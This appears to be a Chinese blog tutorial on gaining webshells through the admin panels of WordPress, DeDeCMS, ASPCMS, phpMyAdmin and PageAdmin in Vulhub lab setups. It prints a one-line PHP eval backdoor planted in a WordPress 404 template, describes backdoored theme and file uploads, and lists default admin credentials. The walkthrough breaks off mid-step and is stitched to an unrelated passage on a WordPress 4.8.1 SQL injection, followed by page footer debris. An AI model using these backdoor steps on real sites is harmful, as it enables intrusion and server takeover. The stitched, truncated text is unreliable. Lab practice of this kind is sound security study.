常见CMS漏洞(WordPress、DeDeCMS、ASPCMS、PHPMyadmin、Pageadmin)

目录

一:WordPress

步骤一:进入Vulhub靶场并执行以下命令开启靶场;在浏览器中访问并安装好子...

步骤二:思路是修改其WP的模板写入一句话木马后门并访问其文件即可GetShel;登陆WP后点击【外观】--》【编辑】 --》 404.php

步骤三:访问以下连接即可获取WebShel...

姿势二:上传主题拿WebShell

步骤一:接着上一个环境使用...将带有后门的文件加入到主题中并将主题压缩为ZIP文件...点击【外观】 --》【主题】 --》【添加】--》【上传主题】--》【浏览】--》【现在安装】

步骤二:安装成功后访问主题下的网站后门文件..

二:DeDeCMS

姿势一:通过文件管理器上传WebShell

步骤一:访问目标靶场其思路为 dedecms 后台可以直接上传任意文件,可以通过文件管理器上传php文件获取webshell...

步骤二:登陆到后台点击【核心】--》【文件式管理器】【文件上传】将准备好的一句话代

码上传...OK

步骤三:访问上传成功后的文件并使用蚁剑连接测试...

姿势二:修改模板文件拿WebShel

步骤一:与WPCMS类似,直接修改模板拿WebShel.点击【模板】-》【默认模板管理】--》【index.htm】-->【修改】在文件修改中添加一句话代码…如下

步骤二:点击 【生成】--》点击【更新主页HTML】--》将主页位置修改为【../index.php 】--》【生成静态】--》点击【更新主页】 再次访问站点首页可发现变化...

步骤三:使用蚁剑进行连接测试.

姿势三:后台任意命令执行拿WebShell

步骤一:点击 【模块】--》【广告管理】--》【增加一个新广告】 --》在 【广告内容】 处添加一句话代码--》点击 【确定】

步骤二:点击【代码】--》在图中显示的路径与站点进行拼接..访问测试!

步骤三:使用蚁剑连接测试...

三:ASPCMS

姿势一:后台修改配置文件拿Shell

步骤一:访问以下地址为ASPCMS.并登陆到后台(这里注意在搭建站点的时候注意权限问题)

步骤二:点击【扩展功能】--》【幻灯片设置】--》点击 【保存】--》开启代理进行抓包

步骤三:在抓取的数据包中修改 slideTextstatus 字段的值为以下代码并进行发包查看被修改的asp文件内容...

步骤四:访问以下地址进行连接...

四、PHPMyadmin

姿势⼀:通过⽇志⽂件拿Shell

姿势⼆:导⼊导出拿WebShell

1.首先判断mysql位置

2.猜测web路径

3.写webshell

4.浏览器

姿势三:界面图像化GetShell

五、Pageadmin

步骤一:准备一个一句话木马的asp文件,然后压缩成zip格式。

步骤二:点击【⼯具】--》 【⽂件管理】--》 【功能菜单】 --》【上传⽂件】

步骤三:解压文件。

步骤四:使用工具连接。


一:WordPress

步骤一:进入Vulhub靶场并执行以下命令开启靶场;在浏览器中访问并安装好子...

#执行命令

cd /vulhub/wordpress/pwnscriptum

docker-compose up -d

#靶场地址

http://192.168.4.176:8080/wp-admin/

步骤二:思路是修改其WP的模板写入一句话木马后门并访问其文件即可GetShel;登陆WP后点击【外观】--》【编辑】 --》 404.php

在其404模板中插入一句话木马代码.点击【更新文件】按钮

<?php eval($ POST['cmd']);?>

步骤三:访问以下连接即可获取WebShel...

#拼接路径

/wp-content/themes/twentyfifteen/404.php

#访问连接

http://192.168.4.176:8080//wp-content/themes/twentyfifteen/404.php

http://192.168.4.176:8080//wp-content/themes/twentyfifteen/404.php

菜刀连接:

姿势二:上传主题拿WebShell

步骤一:接着上一个环境使用...将带有后门的文件加入到主题中并将主题压缩为ZIP文件...点击【外观】 --》【主题】 --》【添加】--》【上传主题】--》【浏览】--》【现在安装】

主题文件

步骤二:安装成功后访问主题下的网站后门文件..

#拼接路径

/wp-content/themes/ Farallon-develop-v0.3.8/shell.php

#访问地址

http://192.168.4.176:8080/wp-content/themes/ Farallon-develop-v0.3.8/shell.php

#蚁剑连接

二:DeDeCMS

漏洞复现

姿势一:通过文件管理器上传WebShell

步骤一:访问目标靶场其思路为 dedecms 后台可以直接上传任意文件,可以通过文件管理器上传php文件获取webshell...

#前台

http://192.168.4.139/dedecms/index.php?upcache=1

http://192.168.4.139/dedecms/index.php?upcache=1

http://192.168.4.139/dedecms/index.php?upcache=1

#后台

http://192.168.4.139/dedecms/dede/

http://192.168.4.139/dedecms/dede/

http://192.168.4.139/dedecms/dede/

#信息

username:admin

password:admin

步骤二:登陆到后台点击【核心】--》【文件式管理器】【文件上传】将准备好的一句话代

码上传...OK

步骤三:访问上传成功后的文件并使用蚁剑连接测试...

#文件地址

### WordPress 4.8.1 版本安全漏洞详情 WordPress 4.8.2 是一次重要的安全性更新,解决了多个存在于之前版本(包括4.8.1)中的高危漏洞。这些缺陷可能允许攻击者执行SQL注入攻击,从而获取敏感数据或控制网站[^1]。 具体来说,在 wp-includes/class-wp-tax-query.php 文件中存在一处逻辑错误,该问题源于对 `$query[terms]` 的不当处理方式。如果字段 `field` 被设置为特定值,则可能导致未经过充分验证的数据被用于构建查询语句,进而引发 SQL 注入风险[^3]。 ### 解决方案与修复建议 为了防止此类攻击的发生并保护站点免受潜在威胁的影响,官方推荐所有用户尽快升级至最新版的 WordPress 发布版本——当时即刻可用的是 4.8.2 或更高版本。此更新不仅修正了上述提到的安全隐患,还包含了其他改进措施来增强系统的整体稳定性与性能表现。 对于无法立即进行全面平台迁移的情况,可以考虑采取临时缓解策略: - **禁用不受信任输入源**:确保来自外部用户的任何参数都经过严格的过滤和转义处理后再参与数据库操作。 - **应用最小权限原则**:限制数据库账户仅拥有完成必要任务所需的最低限度权利,减少因意外泄露而造成的损害范围。 ```php // 示例代码展示如何正确处理 $query 参数以避免 SQL 注入 if ( isset( $query['field'] ) && 'term_taxonomy_id' === $query['field'] ) { // 对 term_taxonomy_ids 进行严格整数型转换 $_ttids = array_map('absint', (array) $query['terms']); } else { // 默认情况下按照 slug 处理 terms 数组成员 $_terms = array_map('sanitize_title_for_query', (array) $query['terms']); } ``` 通过以上手段可以在一定程度上降低遭受攻击的风险,但仍强烈建议及时安装官方发布的正式补丁程序。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值